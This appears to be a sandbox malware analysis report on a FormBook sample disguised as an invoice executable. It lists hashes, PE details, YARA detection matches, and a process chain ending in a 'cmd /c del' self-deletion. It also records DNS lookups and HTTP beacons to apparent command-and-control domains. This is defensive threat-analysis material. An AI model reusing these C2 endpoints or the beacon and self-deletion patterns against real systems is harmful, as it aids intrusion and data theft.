                        DEFENSE-NETUSxHSUX1VjKN.exeGet hashmaliciousBrowse
                        • 206.188.193.204
                        DEUXRWq2W8.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO08485.xlsxGet hashmaliciousBrowse
                        • 206.188.193.204
                        KYTransactionServer.exeGet hashmaliciousBrowse
                        • 206.188.192.207
                        doc_0862413890.exeGet hashmaliciousBrowse
                        • 206.188.193.172
                        PO08485.xlsxGet hashmaliciousBrowse
                        • 206.188.193.204
                        5Zebq6UNKC.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        Lv9eznkydx.exeGet hashmaliciousBrowse
                        • 205.178.189.129
                        x86_64-20211007-1619Get hashmaliciousBrowse
                        • 170.158.122.60
                        BILL OF LADING.exeGet hashmaliciousBrowse
                        • 206.188.198.65
                        2WK7SGkGVZ.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO20211006.docGet hashmaliciousBrowse
                        • 209.17.116.163
                        PO_A9164.EXEGet hashmaliciousBrowse
                        • 209.17.116.163
                        oHdx7w2YXC.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        fmcg.xlsxGet hashmaliciousBrowse
                        • 209.17.116.163
                        M0y2otz1JB.exeGet hashmaliciousBrowse
                        • 206.188.197.227
                        jnnbbMX9Ch.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        3KJ2ZgV4so.exeGet hashmaliciousBrowse
                        • 209.17.116.163
                        cFjtsk0IBh.exeGet hashmaliciousBrowse
                        • 206.188.197.227
                        cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                        • 206.188.193.146

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.log
                        Process:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.355304211458859
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.068386623253211
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:EXPORT INVOICE 2021.exe
                        File size:840704
                        MD5:54bb8fbbfe0a665ca59579a0240ce2f0
                        SHA1:0b97e4463c76df4541179880902bb6966ef3f894
                        SHA256:3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
                        SHA512:fd6ac3075702fffd66df3566015bd6b2d844f28f0dfc0c638bd9198479514479514cf506bfdd56a671efa233873f9313a8b36d80e0bcb78a88624abd9f9b5770
                        SSDEEP:12288:Y+zIPiLYQkt3iJHGmWG3HhY8muu8Rsni2U1Rr6s5yuuETV/O:Y+zWiLYQZaGXhguu8ai2U
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.fa..............P.............n.... ........@.. .......................@............@................................

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4ce86e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6166C74F [Wed Oct 13 11:47:27 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xce81c0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x5b8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xcc8740xcca00False0.600356263363data7.07298793214IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0xd00000x5b80x600False0.423828125data4.11165027332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xd20000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_VERSION0xd00a00x32cdata
                        RT_MANIFEST0xd03cc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright 2017
                        Assembly Version1.0.0.0
                        InternalNameCXGHo0w.exe
                        FileVersion1.0.0.0
                        CompanyName
                        LegalTrademarks
                        Comments
                        ProductNameBallistic Game
                        ProductVersion1.0.0.0
                        FileDescriptionBallistic Game
                        OriginalFilenameCXGHo0w.exe

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        10/13/21-18:23:11.004606ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        10/13/21-18:23:12.994789ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 13, 2021 18:22:42.307439089 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.409260988 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.409439087 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.409841061 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.554083109 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.909389019 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.997302055 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.997476101 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:43.011189938 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:43.011415958 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:58.645088911 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.774971962 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.775136948 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.775289059 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.906469107 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.906518936 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.906800985 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.906903982 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:59.037889957 CEST8049780209.17.116.165192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 13, 2021 18:22:42.179533958 CEST5172653192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:42.301482916 CEST53517268.8.8.8192.168.2.4
                        Oct 13, 2021 18:22:48.022957087 CEST5679453192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:48.464329004 CEST53567948.8.8.8192.168.2.4
                        Oct 13, 2021 18:22:58.514669895 CEST5653453192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:58.641601086 CEST53565348.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:03.918273926 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:04.926768064 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:05.927041054 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:07.974427938 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:09.945480108 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:11.003954887 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:12.994712114 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:14.961127996 CEST5662153192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:15.974524021 CEST5662153192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:16.007596970 CEST53566218.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:21.774266958 CEST6311653192.168.2.48.8.8.8

                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Oct 13, 2021 18:23:11.004606009 CEST192.168.2.48.8.8.8cfff(Port unreachable)Destination Unreachable
                        Oct 13, 2021 18:23:12.994788885 CEST192.168.2.48.8.8.8cfff(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Oct 13, 2021 18:22:42.179533958 CEST192.168.2.48.8.8.80xefe7Standard query (0)www.ratqueen.artA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:48.022957087 CEST192.168.2.48.8.8.80x41b0Standard query (0)www.yuezhong66.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:58.514669895 CEST192.168.2.48.8.8.80xe3a2Standard query (0)www.piedmontpines.schoolA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:03.918273926 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:04.926768064 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:05.927041054 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:07.974427938 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:14.961127996 CEST192.168.2.48.8.8.80xc03fStandard query (0)www.zoipartner.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:15.974524021 CEST192.168.2.48.8.8.80xc03fStandard query (0)www.zoipartner.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:21.774266958 CEST192.168.2.48.8.8.80x27f8Standard query (0)www.sosibibyslot.spaceA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Oct 13, 2021 18:22:42.301482916 CEST8.8.8.8192.168.2.40xefe7No error (0)www.ratqueen.artratqueen.artCNAME (Canonical name)IN (0x0001)
                        Oct 13, 2021 18:22:42.301482916 CEST8.8.8.8192.168.2.40xefe7No error (0)ratqueen.art51.161.86.13A (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:48.464329004 CEST8.8.8.8192.168.2.40x41b0Name error (3)www.yuezhong66.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:58.641601086 CEST8.8.8.8192.168.2.40xe3a2No error (0)www.piedmontpines.school209.17.116.165A (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:09.945480108 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:11.003954887 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:12.994712114 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:16.007596970 CEST8.8.8.8192.168.2.40xc03fName error (3)www.zoipartner.comnonenoneA (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.ratqueen.art
                        • www.piedmontpines.school

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44977851.161.86.1380C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Oct 13, 2021 18:22:42.409841061 CEST5301OUTGET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1
                        Host: www.ratqueen.art
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:42.997302055 CEST5302INHTTP/1.1 301 Moved Permanently
                        Server: nginx
                        Date: Wed, 13 Oct 2021 16:22:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options:
                        X-XSS-Protection: 1; mode=block
                        X-Content-Type-Options: nosniff
                        AS_SERVED_STATIC: false
                        Location: https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa
                        Cache-Control: no-cache
                        X-Request-Id: dc568a08-0ef3-468e-b148-cc198a1a6325
                        X-Runtime: 0.408293
                        Data Raw: 63 30 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 61 74 71 75 65 65 6e 2e 61 72 74 2f 6d 71 69 39 3f 34 68 65 44 3d 2d 5a 67 38 62 6a 76 38 42 4a 78 34 48 42 77 26 61 6d 70 3b 7a 30 3d 69 76 38 41 67 34 62 45 4a 75 49 69 6e 54 52 5a 30 6f 32 33 76 6f 67 67 52 74 50 77 71 74 51 2f 79 64 46 36 30 79 2b 53 2b 41 4a 50 30 5a 32 67 45 64 49 7a 57 31 67 55 31 68 35 59 4f 38 47 50 62 53 4c 61 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: c0<html><body>You are being <a href="https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&amp;z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa">redirected</a>.</body></html>0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449780209.17.116.16580C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Oct 13, 2021 18:22:58.775289059 CEST5308OUTGET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1
                        Host: www.piedmontpines.school
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:58.906469107 CEST5308INHTTP/1.1 400 Bad Request
                        Server: openresty/1.17.8.2
                        Date: Wed, 13 Oct 2021 16:22:58 GMT
                        Content-Type: text/html
                        Content-Length: 163
                        Connection: close
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: EXPORT INVOICE 2021.exe PID: 7128 Parent PID: 5316

                        General

                        Start time:18:21:08
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x930000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:low

                        Chronological Activities

                        Analysis Process: EXPORT INVOICE 2021.exe PID: 5548 Parent PID: 7128

                        General

                        Start time:18:21:36
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:{path}
                        Imagebase:0xa90000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Chronological Activities

                        Analysis Process: explorer.exe PID: 3424 Parent PID: 5548

                        General

                        Start time:18:21:38
                        Start date:13/10/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmstp.exe PID: 1688 Parent PID: 3424

                        General

                        Start time:18:22:03
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmstp.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                        Imagebase:0x350000
                        File size:82944 bytes
                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 5860 Parent PID: 1688

                        General

                        Start time:18:22:08
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 6040 Parent PID: 5860

                        General

                        Start time:18:22:09
                        Start date:13/10/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff724c50000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Disassembly

                        Code Analysis

